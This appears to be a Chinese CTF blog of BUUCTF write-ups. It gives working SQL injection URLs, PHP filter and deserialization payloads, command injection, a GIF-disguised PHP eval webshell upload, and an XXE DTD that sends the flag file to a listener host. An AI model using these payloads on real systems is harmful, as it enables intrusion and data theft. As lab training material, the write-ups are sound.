follow my dream

buuctf_0x02

字数统计: 11.2k阅读时长: 64 min
2020/05/28 Share

[toc]

0x01 周

web

[极客大挑战 2019]Secret File

一路跟着提示,跟到secr3t.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>

php伪协议

1
php://filter/convert.base64-encode/resource=

flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<!DOCTYPE html>

<html>

<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>

<body style="background-color:black;"><br><br><br><br><br><br>

<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>

<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{51e7f07f-2e27-445a-ae66-4341c6252450}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>

</html>

[极客大挑战 2019]PHP

根据提示应该有源代码泄露

1
python3 .\dirsearch.py -u "http://3fe07257-2515-4fc0-b3b6-dcd182c6742f.node3.buuoj.cn/" -e php   --delay 1

www.zip

注意请求过多429

1
2
3
4
5
6
7
└─[极客大挑战 2019]PHP1
└─www
class.php
flag.php
index.js
index.php
style.css
  • index.php
1
2
3
4
5
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
  • class.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
include 'flag.php';


error_reporting(0);


class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}

function __wakeup(){
$this->username = 'guest';
}

function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();


}
}
}
?>

考点__wakeup()绕过

当反序列化字符串中,表示属性个数的值大于其真实值,则跳过__wakeup()执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
#include 'flag.php';


error_reporting(0);


class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct(){
$this->username = 'admin';
$this->password = 100;
}
}

$a = new Name();

$aa = serialize($a);
echo $aa;
1
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

[极客大挑战 2019]LoveSQL

这个题目死死地提醒了我,有时不是Payload没用,而是你忘记编码。。。

报错注入

1
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select )))%23&password=1

XPATH syntax error: ‘ geek’

1
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema='geek' )))%23&password=1

XPATH syntax error: ‘ geekuser,l0ve1ysq1’

1
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(column_name),1,32)from information_schema.columns where table_schema='geek'  and table_name= 'geekuser')))%23&password=1

XPATH syntax error: ‘ id,username,password’

1
2
3
4
and  updatexml(1,concat(0x7e,(select group_concat(username) from geek.geekuser),0x7e),1)
--+
and updatexml(1,concat(0x7e,(select mid(group_concat(password),25,40) from geek.geekuser),0x7e),1)
%23&password=1

得:

1
username=admin&password=d5e5cfb07c326d6707635db2357de47

。。。。么的用

换个法子cai发现可以联合查找,吐血

直接查找l0ve1ysq1表

1
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1'  union select 1,2,group_concat(password) from geek.l0ve1ysq1%23&password=1

flag在password的最后一部分

极客大挑战 2019]Knife

直接连webshell工具,flag在/flag

0x02周

想复现最近比赛的题目。

web

[网鼎杯 2018]Fakebook

此题的注入点是

1
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1

fuzz中显示报错注入函数还可以使用

1
2
3
4
5
6
7
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select 
group_concat(schema_name) from information_schema.schemata),1,32),'~')))



http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select
group_concat(schema_name) from information_schema.schemata),32,64),'~')))

result:

fakebook,information_schema,mysql,performance_schema,test

当前数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select 
group_concat(table_name) from information_schema.tables where table_schema=database() ),1,64),'~')))

[*] query error! (XPATH syntax error: '~users~')


http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select
group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' ),1,64),'~')))

[*] query error! (XPATH syntax error: '~no,username,passwd,data~')



http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select
group_concat(no) from users ),1,64),'~')))


[*] query error! (XPATH syntax error: '~1,2,3,4,5~')



http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select
group_concat(data) from users ),49,1000),'~')))


O:8:"UserInfo":3:{s:4:"name";s:2:"11";s:3:"age";i:11;s:4:"blog";s:12:"http://1.com";},O:8:"UserInfo":3:{s:4:"name";s:3:"111....

再扫描路径发现备份文件

/user.php.bak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php


class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";

public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}

function get($url)
{
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);

return $output;
}

public function getBlogContents ()
{
return $this->get($this->blog);
}

public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}

}

利用file:// 和 序列化 读取文件

1
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no= 0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"fe1w0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

[极客大挑战 2019]Http

1
2
3
4
5
6
7
8
9
10
11
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:26240
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: 127.0.0.1

[GXYCTF2019]Ping Ping Ping

明显的命令执行

参考

https://blog.csdn.net/miuzzx/article/details/104617234

https://www.cnblogs.com/wangtanzhi/p/12246386.html

有空整理一下,命令执行相关知识

[ACTF2020 新生赛]Include

1
2
3
4
5
6
7
8
9
10
11
12
13
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
1
http://f9a66afc-c568-41e2-8e62-6dc3fc6eef68.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php

[极客大挑战 2019]BabySQL

手测过滤了 select union or and if mid

但双写就行

1
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' oorr 1=1--+

login success

6624c656c910f997ad9393630d1aca7d

1
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(schema_name)  frofromm  infoorrmation_schema.schemata %23 

Your password is ‘information_schema,mysql,performance_schema,test,ctf,geek’

1
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(table_name)  frofromm  infoorrmation_schema.tables whwhereere table_schema='ctf' %23 

Your password is ‘Flag’

1
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(column_name)  frofromm  infoorrmation_schema.columns whwhereere table_schema='ctf' anandd table_name='Flag'%23 

Your password is ‘flag’

1
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password='  uniunionon seselectlect  1,2, group_concat(flag)  frofromm  ctf.Flag %23 

[极客大挑战 2019]BuyFlag

查看payflag.php的页面源代码

1
2
3
4
5
6
7
8
9
10
11
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
-->
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /pay.php HTTP/1.1
Host: f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn/pay.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: user=1
Connection: close

password=404a&money=1e99

跟着提示做就行

[ACTF2020 新生赛]Exec

比 PING PING PING

1
2
3
123|find / -name /flag

123|cat /flag

[ZJCTF 2019]NiZhuanSiWe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>

😒 edge 上的hackbar有时不是很顶用,还是火狐上的hackbar插件准确率高

1
2
3
4
http://3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn/index.php?text=php://input&file=file:///etc/passwd

[post]
welcome to the zjctf

根据提示读取useless.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# http://3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn/index.php?text=php://input&file=php://filter/convert.base64-encode/resource=useless.php
# [post] welcome to the zjctf
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /index.php?text=php://input&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} HTTP/1.1
Host: 3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 20

welcome to the zjctf

[极客大挑战 2019]Upload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /upload_file.php HTTP/1.1
Host: 86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn
Content-Length: 340
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZjya86HWY0DubZE0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryZjya86HWY0DubZE0
Content-Disposition: form-data; name="file"; filename="cc.phtml"
Content-Type: image/gif

GIF89a? <script language="php">eval($_REQUEST['f'])</script>
------WebKitFormBoundaryZjya86HWY0DubZE0
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryZjya86HWY0DubZE0--

再连接ANTSWORD

[RoarCTF 2019]Easy Java

u1s1 Java不会,明天上课时候看看

WEB-INF/web.xml泄露

1
2
3
4
5
6
7
WEB-INF主要包含一下文件或目录:
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码

漏洞成因:

1
通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。一般情况,jsp引擎默认都是禁止访问WEB-INF目录的,Nginx 配合Tomcat做均衡负载或集群等情况时,问题原因其实很简单,Nginx不会去考虑配置其他类型引擎(Nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改Nginx配置文件禁止访问WEB-INF目录就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!
  • POST /Download?filename=/WEB-INF/web.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>

image-20200514172859753

http://90e20284-6ad5-42e6-8e86-87aa6a2d443a.node3.buuoj.cn/Download?filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

base64解码

[BJDCTF2020]Easy MD5

https://blog.csdn.net/qq_19980431/article/details/83018232

https://blog.csdn.net/March97/article/details/81222922

http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes

0x01

查看响应头

image-20200514173949391

  • MD5()
参数 描述
string 必需。要计算的字符串。
raw 可选。默认不写为FALSE。32位16进制的字符串TRUE。16位原始二进制格式的字符串

原理利用 md5($pass,true)时,返回值为16位原始二进制格式的字符串

1
2
3
4
content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

拼接后的查询语句为

1
2
3
select * from 'admin' where password=''or'6]!r,b';
#类似
select * from 'admin' where password=''or'6xxxx';

访问得到下一关

1
<script>window.location.replace('./levels91.php')</script

0x02

源代码

1
2
3
4
5
6
7
<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->

利用php弱类型

a=s1836677006a&b=s1885207154a

0x03

1
2
3
4
5
6
7
8
9
10
<?php
#levell14.php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
  • payload
1
param1[]=1&param2[]=2

[ACTF2020 新生赛]BackupFile

源文件

1
http://19f24e41-44d2-46bc-9763-1f20eeeda2f9.node3.buuoj.cn/index.php.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}

http://19f24e41-44d2-46bc-9763-1f20eeeda2f9.node3.buuoj.cn/?key=123

….没多大意思

[BUUCTF 2018]Online Tool

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

0x03周

刚好将网鼎杯上不会的,学习学习学习

web

[网鼎杯 2020 青龙组]AreUSerialz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

protected $op;
protected $filename;
protected $content;

function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}

public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}

private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}

private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}

private function output($s) {
echo "[Result]: <br>";
echo $s;
}

function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}

}

function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}

if(isset($_GET{'str'})) {

$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}

}

此题难点在于 得知道 在php7.2及以上版本中,public可以直接赋值protected中,这点Knight前辈赛后手撕了一波源码 Orz

得知这点后,可以绕过 is_valid()

  • payload

读取文件

1
2
3
#  O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:18:"/proc/self/cmdline";s:7:"content";N;}
# O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:43:"/etc/apache2/sites-enabled/000-default.conf";s:7:"content";N;}
# O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:22:"/var/www/html/flag.php";s:7:"content";N;}

注意看源代码

[网鼎杯 2020 青龙组]filejava

此题存在web.xml泄露

/etc/passwd 下载

1
2
http://ip/DownloadServlet?filename=../../../../../../../../../etc/passwd    
http://ip/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

web.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
</web-app>

根据web.xml上的信息下载class文件

以UploadServlet为例

1
http://ip/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class

反编译

image-20200521020728414

参考 Apache-Poi-XXE-Analysis

在buuoj上再请求一个内网主机

174.1.112.13

/var/www/html 建立test.dtd

1
2
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://174.1.112.13:2999?p=%file;'>">

并修改xlsx中的[Content_Types].xml

1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://174.1.112.13/test.dtd">
%remote;%int;%send;
]>

注意文件名必须要以excel-开头 xlsx结尾

上传xlsx文件,并监听2999端口

1
2
3
root@490bb1f24012:/var/www/html# python -m SimpleHTTPServer 2999
Serving HTTP on 0.0.0.0 port 2999 ...
174.1.111.213 - - [21/May/2020 15:55:12] "GET /?p=flag{105d56b3-ae57-40a7-9f4d-5aa0010827ac} HTTP/1.1" 200 -

相关资料

Apache-Poi-XXE-Analysis

带外通道技术(OOB)总结

[网鼎杯 2020 朱雀组]phpweb

源代码读取

image-20200522015629579

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
$disable_fun = array( "exec" , "shell_exec" , "system" , "passthru" , "proc_open" , "show_source" , "phpinfo" , "popen" , "dl" , "eval" , "proc_terminate" , "touch" , "escapeshellcmd" , "escapeshellarg" , "assert" , "substr_replace" , "call_user_func_array" , "call_user_func" , "array_filter" , "array_walk" , "array_map" , "registregister_shutdown_function" , "register_tick_function" , "filter_var" , "filter_var_array" , "uasort" , "uksort" , "array_reduce" , "array_walk" , "array_walk_recursive" , "pcntl_exec" , "fopen" , "fwrite" , "file_put_contents" );
function gettime ( $func , $p ) {
$result = call_user_func ( $func , $p );
$a = gettype ( $result );
if ( $a == "string" ) {
return $result ;
} else {return "" ;}
}
class Test {
var $p = "Y-m-d h:i:s a" ;
var $func = "date" ;
function __destruct () {
if ( $this -> func != "" ) {
echo gettime ( $this -> func , $this -> p );
}
}
}
$func = $_REQUEST [ "func" ];
$p = $_REQUEST [ "p" ];

if ( $func != null ) {
$func = strtolower ( $func );
if (! in_array ( $func , $disable_fun )) {
echo gettime ( $func , $p );
}else {
die( "Hacker..." );
}
}
?>

利用反序列化

image-20200522025049085

这题好像无法反弹shell

crypto

[网鼎杯 2020 青龙组]you_raise_me_up

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

离散对数,求x 问题

https://blog.csdn.net/qq_41956187/article/details/104981499

这题直接使用python MATH中的log,你会发现log(x,y)是有长度限制的,这也是比赛过程中,最令我纠结的问题

赛后看学长的wp做的

  • 求flag

使用Sage Math

简单的安装和使用实例:https://www.jianshu.com/p/ddf9376334cd

1
2
3
4
5
6
7
8
9
10
11
12
13
┌────────────────────────────────────────────────────────────────────┐
│ SageMath version 9.0, Release Date: 2020-01-01
│ Using Python 3.7.3. Type "help()" for help. │
└────────────────────────────────────────────────────────────────────┘
sage: m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386
....: 318986881041563704825943945069343345307381099559075
sage: c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373
....: 211308485605397024123180085924117610802485972584499
sage: n = 2**512
sage: m = Mod(m, n)
sage: c = Mod(c, n)
sage: discrete_log(c, m)
56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
  • long_to_bytes

pip3 install pycryptodome

1
2
3
from Crypto.Util.number import *
flag = 56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
print(long_to_bytes(flag))

[网鼎杯 2020 青龙组]boom

不推荐直接打开

0x01

cmd5查询

46e5efe6165a5afb361217446a2dbd01

en5oy

0x02

1
2
3
4
5
This time:Here are have some formulas                 3x-y+z=185
2x+3y-z=321
x+y+z=173 input: x = 74
input: y = 68
input: z = 31

0x03

1
2
3
4
5
6
7
8
Last time: Kill it
x*x+x-7943722218936282=0
input x: 89127561

for i in range(10000000,100000000):
if(i*(i+1)==7943722218936282):
print(str(i))

0x04 周

web

[网鼎杯 2020 青龙组]notes

参考:

https://www.anquanke.com/post/id/204856#h2-2

http://www.luyixian.cn/news_show_381840.aspx

如果对原型链污染不了解,可以看看P神这篇文章

原型链污染:

https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html

  • 源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
